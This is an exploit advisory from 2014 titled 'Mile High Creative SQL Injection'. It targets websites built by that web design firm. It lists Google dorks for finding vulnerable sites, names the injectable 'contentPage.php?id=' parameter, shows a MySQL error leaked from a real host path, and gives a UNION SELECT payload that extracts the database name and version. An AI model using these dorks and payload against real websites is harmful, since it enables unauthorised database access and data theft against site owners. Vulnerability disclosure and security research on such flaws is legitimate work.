facebook facebook twitter rss

Mile High Creative SQL Injection

Author: Microsoft-Dz , Published: 21-05-2014
===================================================================

.:. Mile High Creative SQL Injection .:.

####################################################################



#.:. Exploit Title : Mile High Creative Sql Injection


# .:. Author : Microsoft-dz



#.:. Contact : [ifyoucanbebeme@gmail.com]


#.:. Dork :intext :Website by Mile High Creative inurl:/contentPage.php?id=



#.:. Dork 2 : intext :Website by Mile High Creative



#.:. Tested on : win&linux



#.:. Vendor's Website : http://www.milehighcreative.com/



#.:. Date : [2014/5/21]

####################################################################

VULNERABILITY

##############

[~] VULNERABILITY}~~

[~] www.site.com/contentPage.php?id=[SQL INJECTION]

#########

P0C

#########

Type: String Mysql Injection

An error occurred...

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/mangotec/public_html/include/_common.php on line 55


http://SITE/contentPage.php?id=[SQL INJECTION]

http://site/contentPage.php?id=-8+UNION%20SELECT%201,database%28%29,version%28%29,4,5,6,7,8,9,10,11--

#########################################################################

Like us on Facebook :